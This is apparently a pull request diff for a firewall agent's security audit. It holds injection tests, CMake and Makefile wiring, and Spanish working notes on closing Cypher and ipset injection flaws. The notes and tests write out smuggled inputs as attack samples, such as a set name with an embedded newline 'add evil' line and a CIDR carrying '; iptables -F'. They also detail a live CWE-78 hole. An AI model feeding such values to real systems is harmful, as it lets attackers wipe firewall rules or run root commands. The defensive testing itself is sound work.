### PR TITLE
Feature/day188 security debt audit

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -299,3 +299,6 @@ update_docs_day187.py
 
 # DAY188: scripts de un solo uso (no versionar)
 *_day188.py
+apply_h2_cidr_mitigation.py
+convert_ipset_wrapper_nucleo3.py
+verify_h2_mov2_setname.sh

--- a/.gitignore
+++ b/.gitignore
@@ -296,3 +296,6 @@ kill_arbiter.py
 rewire_write_record.py
 place_fuzz_harness.py
 update_docs_day187.py
+
+# DAY188: scripts de un solo uso (no versionar)
+*_day188.py

--- a/Makefile
+++ b/Makefile
@@ -2996,3 +2996,20 @@ correlation-v1-rebuild: correlation-v1-clean correlation-v1-build correlation-v1
 # Con (1)+(2): EMECAS completo (destroy→up→bootstrap→test-all) cubre build Y test
 # de la lib sin tocar nada más. bootstrap→pipeline-build→ml-detector arrastra (1);
 # test-all→test-libs arrastra (2).
+
+# [H-2 DAY188 test-firewall targets]
+.PHONY: test-firewall test-firewall-e2e
+# No-root: tests puros del firewall (validacion/parsing). Entra en make test-all.
+# Los tests que tocan ipset real hacen GTEST_SKIP sin root -> 'Skipped', no 'Failed'.
+test-firewall:
+	@echo "🧪 firewall tests (perfil=$(PROFILE), sin root)"
+	@vagrant ssh -c 'cd $(FIREWALL_BUILD_DIR) && \
+		LD_LIBRARY_PATH=/usr/local/lib \
+		ctest -LE "e2e" --output-on-failure'
+
+# e2e/root: integracion contra ipset real (canario de inyeccion H-2). Solo VM, con sudo.
+test-firewall-e2e:
+	@echo "🧪 firewall e2e (perfil=$(PROFILE), CON root)"
+	@vagrant ssh -c 'cd $(FIREWALL_BUILD_DIR) && \
+		sudo env LD_LIBRARY_PATH=/usr/local/lib \
+		ctest -L "e2e" --output-on-failure'

--- a/correlation-engine/tests/test_cypher_prepared.cpp
+++ b/correlation-engine/tests/test_cypher_prepared.cpp
@@ -187,3 +187,98 @@ TEST(CypherPrepared, RoundTripUint64AndAdversarialStrings) {
 
     cleanup_db(kDbPath);  // db ya cerrada -> lock liberado, seguro borrar
 }
+
+// ─────────────────────────────────────────────────────────────────────────────
+// H-1 SEGUNDO ORDEN: el prepared statement NO re-interpreta sus propios params.
+// test_cypher_prepared (DAY 183) probo que  '  y  \  sobreviven byte-identicos
+// (el dato no ROMPE la query). Este test prueba lo complementario: un dato que
+// PARECE sintaxis de parametro ($flow_uid, $ingested_at) se almacena LITERAL, no
+// se expande al valor del otro binding. Cierra el vector de inyeccion de 2o orden:
+// no existe una segunda pasada de interpolacion sobre la salida del bind.
+// Si Kuzu re-expandiera, node_id volveria como el flow_uid real (o como el entero
+// de ingested_at) en vez de la cadena "$flow_uid". -> H-1 cerrada con ATAQUE, no
+// solo con ausencia de concatenacion.
+// ─────────────────────────────────────────────────────────────────────────────
+TEST(CypherPrepared, SecondOrderParamTokensStoredLiterally) {
+    cleanup_db(kDbPath);
+
+    {
+        SystemConfig cfg;
+        auto db   = std::make_unique<Database>(kDbPath, cfg);
+        auto conn = std::make_unique<Connection>(db.get());
+
+        for (const auto& stmt : split_statements(SCHEMA_PATH)) {
+            auto r = conn->query(stmt);
+            ASSERT_TRUE(r->isSuccess()) << "DDL: " << r->getErrorMessage() << " | " << stmt;
+        }
+
+        // Datos cuyo CONTENIDO es sintaxis de parametro Cypher. Si hubiera una 2a
+        // pasada de interpolacion, estos se expandirian; deben volver literales.
+        CorrelationRecord r;
+        r.schema_version = "1";
+        r.source_sensor  = "argus";
+        r.event_id       = "$event_id";        // token que referencia su propio param
+        r.node_id        = "$flow_uid";        // <-- 2o orden: nombre de OTRO binding
+        r.community_id   = "$ingested_at";     // <-- 2o orden: binding de tipo UINT64
+        r.flow_start_sec = 1700000000;
+        r.flow_start_nano = 654321;
+        r.final_classification = "MALICIOUS";  // -> plantilla Alert
+        r.threat_category      = "RANSOMWARE";
+        r.fast_detector_score  = 0.42;
+        r.ml_detector_score    = 0.88;
+        r.overall_threat_score = 0.73;
+        r.authoritative_source = "DETECTOR_SOURCE_CONSENSUS";
+
+        const std::string fuid = compute_flow_uid(
+            r.node_id, r.community_id, window_micros(r.flow_start_sec, r.flow_start_nano));
+
+        const uint64_t kIngested = 1'700'000'001'000'000'000ULL;
+        const CypherBindings b = make_bindings(r, fuid, kIngested);
+        ASSERT_TRUE(b.is_alert);
+
+        auto prep = conn->prepare(std::string(cypher_template(b.is_alert)));
+        ASSERT_TRUE(prep->isSuccess()) << "prepare: " << prep->getErrorMessage();
+        auto res = conn->execute(prep.get(),
+            std::make_pair(std::string("flow_uid"),             std::string(b.flow_uid)),
+            std::make_pair(std::string("node_id"),              std::string(b.node_id)),
+            std::make_pair(std::string("community_id"),         std::string(b.community_id)),
+            std::make_pair(std::string("event_id"),             std::string(b.event_id)),
+            std::make_pair(std::string("final_classification"), std::string(b.final_classification)),
+            std::make_pair(std::string("threat_category"),      std::string(b.threat_category)),
+            std::make_pair(std::string("authoritative_source"), std::string(b.authoritative_source)),
+            std::make_pair(std::string("flow_start_window"),    b.flow_start_window),
+            std::make_pair(std::string("seq_in_window"),        b.seq_in_window),
+            std::make_pair(std::string("ingested_at"),          b.ingested_at),
+            std::make_pair(std::string("temporal_anomaly"),     b.temporal_anomaly),
+            std::make_pair(std::string("fast_detector_score"),  b.fast_detector_score),
+            std::make_pair(std::string("ml_detector_score"),    b.ml_detector_score),
+            std::make_pair(std::string("overall_threat_score"), b.overall_threat_score));
+        ASSERT_TRUE(res->isSuccess()) << "execute: " << res->getErrorMessage();
+
+        // Read-back parametrizado (no interpolo el fuid: el match va por $u).
+        auto rprep = conn->prepare(
+            "MATCH (f:NetworkFlow {flow_uid:$u}) RETURN f.node_id, f.community_id");
+        ASSERT_TRUE(rprep->isSuccess()) << rprep->getErrorMessage();
+        auto rr = conn->execute(rprep.get(), std::make_pair(std::string("u"), fuid));
+        ASSERT_TRUE(rr->isSuccess()) << rr->getErrorMessage();
+        ASSERT_TRUE(rr->hasNext());
+        auto t = rr->getNext();
+
+        // CLAVE: vuelven como las cadenas literales, NO expandidas.
+        EXPECT_EQ(t->getValue(0)->toString(), std::string("$flow_uid"));     // no -> fuid real
+        EXPECT_EQ(t->getValue(1)->toString(), std::string("$ingested_at")); // no -> entero kIngested
+
+        // Y el event_id literal "$event_id" localiza el nodo Alert (no se expandio).
+        auto eprep = conn->prepare(
+            "MATCH (e:Alert {event_id:$e}) RETURN e.node_id, e.flow_uid");
+        ASSERT_TRUE(eprep->isSuccess()) << eprep->getErrorMessage();
+        auto er = conn->execute(eprep.get(), std::make_pair(std::string("e"), std::string("$event_id")));
+        ASSERT_TRUE(er->isSuccess()) << er->getErrorMessage();
+        ASSERT_TRUE(er->hasNext());
+        auto et = er->getNext();
+        EXPECT_EQ(et->getValue(0)->toString(), std::string("$flow_uid"));    // node_id literal
+        EXPECT_EQ(et->getValue(1)->toString(), fuid);                        // $flow_uid bindeado = fuid real
+    }
+
+    cleanup_db(kDbPath);
+}

--- a/docs/BACKLOG.md
+++ b/docs/BACKLOG.md
@@ -85,6 +85,35 @@
 | **aRGus-seL4** | ⏳ No iniciada | Apéndice científico. Kernel seL4, libpcap. Branch independiente. |
 
 ---
+## DEBT-AUTONOMY-REACTOR-SAFEEXEC-002 (P2, POST-FEDER)
+**Origen:** DAY190, audit DEBT-AUTONOMY-REACTOR-CWE78-001.
+**Estado:** CWE-78 MITIGADA en frontera (parse_autonomy valida CIDR, tests verdes).
+El std::system de autonomy_reactor.cpp:11 sigue estructuralmente presente,
+silenciado con nosemgrep INTERINO justificado.
+**Acción pendiente (B):** eliminar el system() de raíz.
+- IptablesExecutor: function<int(const string&)> → function<int(const vector<string>&)>.
+- default_executor → safe_exec({...}) (execv sin shell, ruta absoluta /sbin/iptables).
+- Reescribir los ~10 run("iptables...") de apply/lift_default_deny a tokens.
+- Al tokenizar, las comillas \"...\" de --comment DESAPARECEN (execv no usa shell).
+- Toca mock StubExecutor (test_firewall_stubs.hpp) + T1–T9 de test_autonomy_subscriber.
+  → su propia rama, su propio EMECAS++.
+  **Cierre:** retirar el nosemgrep cuando el system() desaparezca. semgrep dejará de
+  disparar por ausencia de system(), no por silenciado.
+  **Por qué post-FEDER:** mitigación actual cierra el riesgo real; el refactor es
+  defensa en profundidad, no urgencia. Hay fondos para hacerlo bien, sin prisa.
+
+## DEBT-AUDIT-VBOXSF-IO-001 (P2)
+**Origen:** DAY190. make audit (semgrep árbol completo) se estrangula por I/O de
+vboxsf sobre /vagrant. Proceso semgrep-core en estado 'D' (uninterruptible sleep,
+espera de disco), CPU ~50% del wall-time. ~16 min sin terminar → cortado.
+**NO es DEBT-SEMGREP-CPP-HANG-001** (ese es CPU-bound/backtracking; este es I/O-bound).
+**Workaround validado:** semgrep acotado por fichero termina en segundos (misma
+táctica DAY189 ipset_wrapper). Para findings puntuales, acotar.
+**Mitigación candidata:** copiar árbol a fs NATIVO del guest (/tmp, /home/vagrant)
+antes de semgrep — misma lección que kuzu_concurrency_smoke ("BD en fs NATIVO,
+NUNCA /vagrant, vboxsf rompe mmap"). Mismo enemigo, otra herramienta.
+**Impacto:** make audit completo no es gate fiable hasta resolver esto. Hoy el gate
+se valida por (a) cppcheck completo verde + (b) semgrep acotado a ficheros tocados.
 
 ## 🆕 Entradas DAY 187 — B4: rewire write_record→serialize + árbitro build_row BORRADO (Camino A)
 

--- a/docs/continuity/PROMPT_CONTINUE_CLAUDE.md
+++ b/docs/continuity/PROMPT_CONTINUE_CLAUDE.md
@@ -1,75 +1,65 @@
-## Estado de arranque (verificado al cierre de DAY 188)
-- Rama `feature/day188-security-debt-audit` sobre `b6352fa9` (main actual; el prompt
-  de DAY 188 decía 888ed69a pero main avanzó con el merge del PR #102, README).
-- Dos commits limpios, separados por naturaleza:
-  - `b3f4a3df` — seguridad: H-1 (Cypher injection) + H-2 movimiento 1 (IP injection).
-  - `429e40ac` — infra: targets test-firewall por perfil + .gitignore (*_day188.py).
-- H-1 (Cypher injection): CERRADA. Producción 100% parametrizada (ADR-057).
-  `dialect_smoke.cpp` (huérfano que ejecutaba la salida interpolada) eliminado.
-  Evidencia: test_cypher_prepared.cpp 7/7, incl. test de 2º orden (param-token como
-  dato literal, no re-interpolación).
-- H-2 movimiento 1 (IP injection): CERRADO. `is_valid_ip` endurecido contra bypass
-  CIDR+`\n` (allowlist estricto + prefijo CIDR en rango). `is_valid_ip` movido a public.
-  Evidencia: unit test_ipset_is_valid_ip 7/7 + e2e test_ipset_injection_integration 1/1
-  (canario set_exists(evil)==false contra ipset real, requiere root).
-- Build en /vagrant/firewall-acl-agent/build-$(PROFILE); profiles: debug, production, etc.
+## CIERRE DAY 189 (07:03) — H-2 NÚCLEO 1+3 cerrados; audit destapó foco nuevo
 
-## INVARIANTE DE ARRANQUE — REGLA EMECAS (no negociable)
-- main pasó EMECAS al cierre de DAY 187; la rama de hoy NO ha tocado el invariante de
-  arranque. Mañana: confirmar verde en la RAMA antes de seguir:
-  make build && make test-all   (perfil debug)
-  make test-firewall            (no-root, debe ir verde)
-  (Si no sale verde, NO se toca nada más hasta que lo esté.)
-- PENDIENTE de decisión: pushear rama como backup esta noche. NO abrir PR-a-main hasta
-  cerrar H-2 mov.2 (make audit no puede estar verde para H-2 hasta entonces).
+### COMPLETADO HOY (verificado)
+- **H-2 NÚCLEO 1 (set_name en add_batch/delete_batch): CERRADO.**
+  - Validador `is_valid_set_name` extraído a header standalone `set_name_validator.hpp`
+    (allowlist [A-Za-z0-9_-], ≤IPSET_MAXNAMELEN-1=31, rechaza '-' inicial CWE-88 + \n/control).
+  - config_loader REUSA el validador (inline retirado, sin duplicación DRY).
+  - Wrapper llama al guard en add/delete ANTES de set_exists_unlocked (orden verificado).
+  - Enum INVALID_SET_NAME añadido y usado.
+  - Tests: unit #42-#48 (config + standalone, 2 ejes ortogonales) VERDES.
+  - Canario e2e #70 (set_name "\nadd evil" + "-X", aserta sobre efecto) VERDE con root.
+- **H-2 NÚCLEO 3 (retirar shell de 11 métodos + validación universal): CERRADO.**
+  - 12 focos shell (system/popen/execute_command) → safe_exec* (sin shell). grep = 0 focos reales.
+  - execute_command eliminada.
+  - Validación de entrada en CADA superficie: is_valid_set_name en create/destroy/flush/
+    rename/swap/test/get_stats/list_entries; validate_filepath en save/restore.
+  - kIpsetBin="/sbin/ipset" (execv NO usa PATH — ruta absoluta).
+  - Canarios e2e #69+#70 VERDES tras conversión = comportamiento preservado.
+  - test-firewall 68/68. semgrep acotado a ipset_wrapper.cpp: LIMPIO.
 
-## OBJETIVO DE HOY (DAY 189): H-2 movimiento 2 — cerrar H-2 del todo
-MISMA rama `feature/day188-security-debt-audit` (H-1 + H-2 completa = un audit coherente).
-Tesis: dejar `make audit` verde para H-2 retirando el shell y validando los campos
-restantes que alimentan el fichero `ipset restore`.
+### 🔴 DESCUBIERTO HOY POR EL AUDIT — VIVO, SIN MITIGAR (PRIMERO MAÑANA)
+- **DEBT-AUTONOMY-REACTOR-CWE78-001 — autonomy_reactor.cpp:11**
+  - `default_executor`: `std::system(cmd.c_str())` con cmd construido por concatenación.
+  - cmd línea 87: `"iptables -A "+ch+" -s "+cidr+...` donde cidr ∈ whitelist_cidrs_.
+  - whitelist_cidrs viene de firewall.json["autonomy"]["whitelist_cidrs"], parseado por
+    parse_autonomy (config_loader.cpp:493) SIN validar contenido (solo existe/array/no-vacío).
+  - => CWE-78 VIVO: CIDR malicioso en JSON ("1.2.3.0/24; iptables -F") → system() root.
+  - MISMA clase que H-2-ipset, en otro punto. El audit hizo su trabajo.
+  - ESTADO: no tocado hoy (mismo estado que al empezar — ni introducido ni cerrado).
 
-### NÚCLEO
-**1. set_name crudo al fichero restore** (firewall-acl-agent/src/core/ipset_wrapper.cpp:
-~L329 add_batch, ~L416 delete_batch). Un `\n` en set_name inyecta línea restore igual
-que lo hacía la IP. PRIMER PASO = DIAGNÓSTICO, no validar a ciegas:
-- Mirar tests/unit/test_config_loader_setname.cpp y de dónde sale el validador que
-  prueba. HIPÓTESIS: ya existe un validador de set_name reutilizable. NO duplicar.
-- Si sirve, reusarlo. Si no, allowlist `[A-Za-z0-9_.:-]`, longitud ≤ IPSET_MAXNAMELEN,
-  RECHAZAR `-` inicial (CWE-88 argument injection).
-- Test que ataque: set_name = "x\nadd evil 6.6.6.6" y set_name = "-X".
+### PLAN DAY 190 (en orden, mitigación PRIMERO)
+1. **MITIGAR CWE-78 (lo único vivo):** en parse_autonomy, validar cada CIDR ANTES de
+   aceptarlo. Función libre is_valid_ip_cidr (extraer de IPSetWrapper::is_valid_ip, hoy
+   es método — patrón idéntico a set_name_validator). Fail-fast: throw si CIDR inválido.
+  + TEST DE ATAQUE: cargar JSON con CIDR malicioso → verificar throw.
+2. **Refactor a safe_exec (defensa en profundidad):** IptablesExecutor de
+   function<int(const string&)> → function<int(const vector<string>&)>. Reescribir los
+   ~10 run("iptables...") a tokens + default_executor a safe_exec({...}). Toca mock de
+   tests #66/#67/#68 — su propia rama, su propio EMECAS.
+3. **NÚCLEO 2 (comment en add_batch):** medir qué hace `ipset restore` con `"`/`\n`/`\`
+   en comment (parser real, ya SIN shell tras NÚCLEO 3). Rechazar \n (no stripear).
+4. **make audit completo VERDE:** tras mitigación CIDR, semgrep aún marca línea 11 (ve el
+   system(), no la validación en otro fichero). Opciones: nosemgrep JUSTIFICADO con ref a
+   deuda + test de ataque como prueba (legítimo: falso-positivo-tras-mitigación), O cerrar
+   el refactor safe_exec (mata el system() del todo, mejor). Decisión mañana.
+5. **Canario cobertura 11 métodos:** un test parametrizado e2e que ataque
+   destroy/rename/swap/etc con nombre malicioso (hoy solo add/delete tienen canario).
 
-**2. comment solo escapa `"`, no `\n`** (~L343). Sanear saltos antes del fichero restore.
-Test: comment con `\n` no inyecta línea restore.
+### ESTADO AUDIT (honesto)
+- ipset_wrapper.cpp (H-2): LIMPIO en semgrep.
+- H-1 Cypher (cypher_builder, DAY 188): cerrado.
+- **make audit COMPLETO: NO verde.** autonomy_reactor.cpp:11 dispara (blocking).
+  NO afirmar "audit verde" hasta resolver punto 1+4. Evidencia actual de H-1/H-2 =
+  audit ACOTADO a ipset_wrapper.cpp + ml-detector/src, no el completo.
+- DEBT-AUDIT-SEMGREP-PERF: descartado — el "timeout" de autonomy_reactor era HIT real
+  (exit≠0 por --error), no backtracking. semgrep termina rápido, el finding es legítimo.
 
-**3. Retirar popen/system de los ~13 métodos** → safe_exec/execvp (patrón ya probado,
-ver tests/unit/test_safe_exec.cpp). create_set, destroy_set, flush_set,
-set_exists_unlocked, test, rename_set, swap_sets, save, restore, list_sets, get_stats,
-list_entries. Para los que leen stdout (list_sets, get_stats, list_entries): variante
-que captura salida; el `| grep '^add'` de list_entries → a C++.
-
-**4. make audit (semgrep) VERDE para H-2** — solo legítimo TRAS 1-3. Cualquier supresor
-con justificación + test de ataque como prueba. NO contorsionar código para callar al
-linter. Medir, no votar.
-
-### RELLENO SI SOBRA SESIÓN
-- Comentario huérfano `/// Validate IP address format` en ipset_wrapper.hpp (quedó tras
-  mover la declaración a public). Borrar.
-
-### FUERA DE ESTA RAMA (a propósito)
-- Limpieza de huérfanos TRACKED: ipset_wrapper.hpp.old + 4 .py de merges previos
-  (add_newline_guard_test.py, update_docs_day184/185.py, validate_correlation_v1_scaffold.py).
-  Su propio commit/rama. Herramienta lista: cleanup_tracked_cruft_day188.py (--discover
-  para ver la deuda TOTAL de backups en el árbol; era intuición de DAY 188, medirla).
-- Enganchar test-firewall a test-all (toca el invariante EMECAS de arranque) → decisión
-  separada, con calma.
-
-## Cierre del día (DAY 189)
-- make audit VERDE para H-1 Y H-2 + EMECAS verde.
-- Commits separados por naturaleza. Marcar H-2 CERRADA en docs/BACKLOG.md (con día +
-  evidencia: unit+e2e mov1, tests mov2, audit verde).
-- AHORA SÍ: PR a main "DAY 188-189: cierre audit H-1/H-2". Unidad revisable.
-- Continuity DAY 190 + post LinkedIn.
-
-## Contacto / referencias
-Dr. Andrés Caro Lindo (andresc@unex.es, UEx/INCIBE). Paper arXiv:2604.04952 Draft v18.
-Consejo de Sabios (8 modelos) para revisión adversarial si mov.2 lo merece.
+### ESTADO GIT (decidir antes de cerrar terminal)
+- Rama feature/day188-security-debt-audit con NÚCLEO 1+3 sin commitear aún.
+- NÚCLEO 1+3 son cierre coherente y testeado → COMMITEAR hoy (no dejar working tree sucio
+  toda la noche). Mensaje: "DAY189 H-2 NÚCLEO 1+3: set_name validation + shell removal en
+  ipset_wrapper (safe_exec, 0 focos shell, canarios e2e verdes)".
+- autonomy_reactor NO entra en este commit (no tocado). Su mitigación = commit/rama propia mañana.
+- NÚCLEO 2 pendiente → NO marcar H-2 CERRADA en BACKLOG todavía (falta comment + audit verde).
+- Pushear rama como backup esta noche (estaba pendiente desde arranque DAY 188).

--- a/docs/continuity/PROMPT_CONTINUE_CLAUDE.md
+++ b/docs/continuity/PROMPT_CONTINUE_CLAUDE.md
@@ -1,1 +1,75 @@
-DAY 186 → 187. HECHO hoy: validate Camino A (rechaza \n/\r en 11 campos texto, acepta \t) escrito + verde bajo -Werror; test P2 con 6 CHECK probado por aserción, frontera confirmada visual. Origen \n MEDIDO: imposible en ml-detector (final_classification∈{MALICIOUS,BENIGN}, threat_category∈cerrado-5, zmq_handler.cpp:437,547+); guard protege productores texto-libre futuros (Suricata/Wazuh/Zeek/Andrés). PENDIENTE, con oráculo (build_row) AÚN VIVO: (1) Recongelar golden vía capture_golden: rincon_04(\n) + vector \r → WRITTEN→REJECTED; WRITTEN=26 SKIPPED=1 pasa a WRITTEN=24 SKIPPED=1 REJECTED=2. (2) RED→GREEN del bug reader: rincon_04 por oráculo → main.cpp getline/parse_and_verify lo pierde (0 records, HMAC fail) = RED; con validate A el writer lo rechaza en origen = GREEN. Vive en ml-detector/tests/integration. (3) Fuzz serialize(to_row(e),key) vs write_record vivo, build_row de árbitro. (4) Verde → barrido B4: rewire write_record tri-estado (serialize(tr.row,hmac_key_)+sr.line) + guard constructor (throw si hmac_key_hex.size()!=64||hmac_key_.size()!=32, restaura invariante CsvEventWriter:103) + test guard (""/"deadbeef"→throw, simétrico test_csv_event_writer:319,329) + borrar build_row(cpp:98,hpp:75)+compute_hmacwriter(cpp:82,hpp:76)+línea170. Null-safety ✅ ya existe (zmq_handler:522 &&, 160 nullptr). Test cierre: grep -rn 'build_row\|CorrelationWriter::compute_hmac'=0 con peso. EMECAS con test_correlation_roundtrip = prueba HMAC e2e. Orden inamovible: recongelar → RED→GREEN → fuzz (oráculo árbitro) → barrido → borrar. NO borrar build_row antes del fuzz (pierdes el árbitro). Arista anotada: DEBT-MAKE-TEST-DEPENDS-BUILD-001 (correlation-v1-test revienta con cd si no precede build).
+## Estado de arranque (verificado al cierre de DAY 188)
+- Rama `feature/day188-security-debt-audit` sobre `b6352fa9` (main actual; el prompt
+  de DAY 188 decía 888ed69a pero main avanzó con el merge del PR #102, README).
+- Dos commits limpios, separados por naturaleza:
+  - `b3f4a3df` — seguridad: H-1 (Cypher injection) + H-2 movimiento 1 (IP injection).
+  - `429e40ac` — infra: targets test-firewall por perfil + .gitignore (*_day188.py).
+- H-1 (Cypher injection): CERRADA. Producción 100% parametrizada (ADR-057).
+  `dialect_smoke.cpp` (huérfano que ejecutaba la salida interpolada) eliminado.
+  Evidencia: test_cypher_prepared.cpp 7/7, incl. test de 2º orden (param-token como
+  dato literal, no re-interpolación).
+- H-2 movimiento 1 (IP injection): CERRADO. `is_valid_ip` endurecido contra bypass
+  CIDR+`\n` (allowlist estricto + prefijo CIDR en rango). `is_valid_ip` movido a public.
+  Evidencia: unit test_ipset_is_valid_ip 7/7 + e2e test_ipset_injection_integration 1/1
+  (canario set_exists(evil)==false contra ipset real, requiere root).
+- Build en /vagrant/firewall-acl-agent/build-$(PROFILE); profiles: debug, production, etc.
+
+## INVARIANTE DE ARRANQUE — REGLA EMECAS (no negociable)
+- main pasó EMECAS al cierre de DAY 187; la rama de hoy NO ha tocado el invariante de
+  arranque. Mañana: confirmar verde en la RAMA antes de seguir:
+  make build && make test-all   (perfil debug)
+  make test-firewall            (no-root, debe ir verde)
+  (Si no sale verde, NO se toca nada más hasta que lo esté.)
+- PENDIENTE de decisión: pushear rama como backup esta noche. NO abrir PR-a-main hasta
+  cerrar H-2 mov.2 (make audit no puede estar verde para H-2 hasta entonces).
+
+## OBJETIVO DE HOY (DAY 189): H-2 movimiento 2 — cerrar H-2 del todo
+MISMA rama `feature/day188-security-debt-audit` (H-1 + H-2 completa = un audit coherente).
+Tesis: dejar `make audit` verde para H-2 retirando el shell y validando los campos
+restantes que alimentan el fichero `ipset restore`.
+
+### NÚCLEO
+**1. set_name crudo al fichero restore** (firewall-acl-agent/src/core/ipset_wrapper.cpp:
+~L329 add_batch, ~L416 delete_batch). Un `\n` en set_name inyecta línea restore igual
+que lo hacía la IP. PRIMER PASO = DIAGNÓSTICO, no validar a ciegas:
+- Mirar tests/unit/test_config_loader_setname.cpp y de dónde sale el validador que
+  prueba. HIPÓTESIS: ya existe un validador de set_name reutilizable. NO duplicar.
+- Si sirve, reusarlo. Si no, allowlist `[A-Za-z0-9_.:-]`, longitud ≤ IPSET_MAXNAMELEN,
+  RECHAZAR `-` inicial (CWE-88 argument injection).
+- Test que ataque: set_name = "x\nadd evil 6.6.6.6" y set_name = "-X".
+
+**2. comment solo escapa `"`, no `\n`** (~L343). Sanear saltos antes del fichero restore.
+Test: comment con `\n` no inyecta línea restore.
+
+**3. Retirar popen/system de los ~13 métodos** → safe_exec/execvp (patrón ya probado,
+ver tests/unit/test_safe_exec.cpp). create_set, destroy_set, flush_set,
+set_exists_unlocked, test, rename_set, swap_sets, save, restore, list_sets, get_stats,
+list_entries. Para los que leen stdout (list_sets, get_stats, list_entries): variante
+que captura salida; el `| grep '^add'` de list_entries → a C++.
+
+**4. make audit (semgrep) VERDE para H-2** — solo legítimo TRAS 1-3. Cualquier supresor
+con justificación + test de ataque como prueba. NO contorsionar código para callar al
+linter. Medir, no votar.
+
+### RELLENO SI SOBRA SESIÓN
+- Comentario huérfano `/// Validate IP address format` en ipset_wrapper.hpp (quedó tras
+  mover la declaración a public). Borrar.
+
+### FUERA DE ESTA RAMA (a propósito)
+- Limpieza de huérfanos TRACKED: ipset_wrapper.hpp.old + 4 .py de merges previos
+  (add_newline_guard_test.py, update_docs_day184/185.py, validate_correlation_v1_scaffold.py).
+  Su propio commit/rama. Herramienta lista: cleanup_tracked_cruft_day188.py (--discover
+  para ver la deuda TOTAL de backups en el árbol; era intuición de DAY 188, medirla).
+- Enganchar test-firewall a test-all (toca el invariante EMECAS de arranque) → decisión
+  separada, con calma.
+
+## Cierre del día (DAY 189)
+- make audit VERDE para H-1 Y H-2 + EMECAS verde.
+- Commits separados por naturaleza. Marcar H-2 CERRADA en docs/BACKLOG.md (con día +
+  evidencia: unit+e2e mov1, tests mov2, audit verde).
+- AHORA SÍ: PR a main "DAY 188-189: cierre audit H-1/H-2". Unidad revisable.
+- Continuity DAY 190 + post LinkedIn.
+
+## Contacto / referencias
+Dr. Andrés Caro Lindo (andresc@unex.es, UEx/INCIBE). Paper arXiv:2604.04952 Draft v18.
+Consejo de Sabios (8 modelos) para revisión adversarial si mov.2 lo merece.

--- a/firewall-acl-agent/CMakeLists.txt
+++ b/firewall-acl-agent/CMakeLists.txt
@@ -337,6 +337,7 @@ if(BUILD_TESTS)
             tests/unit/test_config_loader_traversal.cpp
             tests/unit/test_config_loader_setname.cpp
             tests/unit/test_set_name_validator.cpp
+            tests/unit/test_parse_autonomy_cidr_injection.cpp   # ← DAY190 CWE-78
             tests/unit/test_safe_exec.cpp
             tests/test_globals_stub.cpp
     )
@@ -391,6 +392,17 @@ if(BUILD_TESTS)
             ${ZMQ_LIBRARIES}
     )
     add_test(NAME test_autonomy_subscriber COMMAND test_autonomy_subscriber)
+
+    # test_ip_cidr_validator — standalone (propio main CHECK, sin GTest) — DAY190 CWE-78
+    add_executable(test_ip_cidr_validator
+            tests/unit/test_ip_cidr_validator.cpp
+    )
+    target_include_directories(test_ip_cidr_validator
+            PRIVATE
+            ${CMAKE_CURRENT_SOURCE_DIR}/include
+    )
+    add_test(NAME test_ip_cidr_validator COMMAND test_ip_cidr_validator)
+
 # ── Test A: Autonomy E2E DAY 156 ─────────────────────────────────────────────
 add_executable(test_autonomy_e2e
     tests/test_autonomy_e2e.cpp
@@ -506,5 +518,8 @@ if(TARGET test_auto_isolate)
 endif()
 if(TARGET test_autonomy_subscriber)
     target_compile_options(test_autonomy_subscriber PRIVATE -UNDEBUG)
+endif()
+if(TARGET test_ip_cidr_validator)
+    target_compile_options(test_ip_cidr_validator PRIVATE -UNDEBUG)
 endif()
 

--- a/firewall-acl-agent/CMakeLists.txt
+++ b/firewall-acl-agent/CMakeLists.txt
@@ -331,6 +331,7 @@ if(BUILD_TESTS)
     endif()
 
     set(TEST_SOURCES
+            tests/unit/test_ipset_is_valid_ip.cpp
             tests/unit/test_ipset_wrapper.cpp
             tests/unit/test_logger.cpp
             tests/unit/test_config_loader_traversal.cpp
@@ -405,6 +406,23 @@ target_link_libraries(test_autonomy_e2e PRIVATE
     zmq
 )
 add_test(NAME test_autonomy_e2e COMMAND test_autonomy_e2e)
+
+    # [H-2 DAY188 tests wired]
+    # H-2 DAY188: ipset injection (INTEGRACION, requiere root+ipset -> VM, no make test normal)
+    add_executable(test_ipset_injection_integration
+        tests/unit/test_ipset_injection_integration.cpp
+    )
+    target_include_directories(test_ipset_injection_integration PRIVATE
+        ${CMAKE_CURRENT_SOURCE_DIR}/include
+        ${CMAKE_CURRENT_SOURCE_DIR}/src/core
+    )
+    target_link_libraries(test_ipset_injection_integration PRIVATE
+        firewall_core
+        GTest::gtest
+        GTest::gtest_main
+    )
+    add_test(NAME test_ipset_injection_integration COMMAND test_ipset_injection_integration)
+    set_tests_properties(test_ipset_injection_integration PROPERTIES LABELS "e2e;root")
 
     gtest_discover_tests(firewall_tests)
 

--- a/firewall-acl-agent/CMakeLists.txt
+++ b/firewall-acl-agent/CMakeLists.txt
@@ -336,6 +336,7 @@ if(BUILD_TESTS)
             tests/unit/test_logger.cpp
             tests/unit/test_config_loader_traversal.cpp
             tests/unit/test_config_loader_setname.cpp
+            tests/unit/test_set_name_validator.cpp
             tests/unit/test_safe_exec.cpp
             tests/test_globals_stub.cpp
     )
@@ -423,6 +424,22 @@ add_test(NAME test_autonomy_e2e COMMAND test_autonomy_e2e)
     )
     add_test(NAME test_ipset_injection_integration COMMAND test_ipset_injection_integration)
     set_tests_properties(test_ipset_injection_integration PROPERTIES LABELS "e2e;root")
+
+    # H-2 DAY189: ipset SET_NAME injection (INTEGRACION, root+ipset -> VM)
+    add_executable(test_ipset_setname_injection_integration
+            tests/unit/test_ipset_setname_injection_integration.cpp
+    )
+    target_include_directories(test_ipset_setname_injection_integration PRIVATE
+            ${CMAKE_CURRENT_SOURCE_DIR}/include
+            ${CMAKE_CURRENT_SOURCE_DIR}/src/core
+    )
+    target_link_libraries(test_ipset_setname_injection_integration PRIVATE
+            firewall_core
+            GTest::gtest
+            GTest::gtest_main
+    )
+    add_test(NAME test_ipset_setname_injection_integration COMMAND test_ipset_setname_injection_integration)
+    set_tests_properties(test_ipset_setname_injection_integration PROPERTIES LABELS "e2e;root")
 
     gtest_discover_tests(firewall_tests)
 

--- a/firewall-acl-agent/include/firewall/config_loader.hpp
+++ b/firewall-acl-agent/include/firewall/config_loader.hpp
@@ -206,6 +206,9 @@ class ConfigLoader {
 public:
     // public para testabilidad directa — función pura de parseo (ADR-042, DEBT-IRP-AUTOISO-FALSE-001)
     static IrpConfig parse_irp(const std::string& isolate_json_path);
+    // public para testabilidad directa — valida CIDRs contra inyección (DEBT-AUTONOMY-REACTOR-CWE78-001)
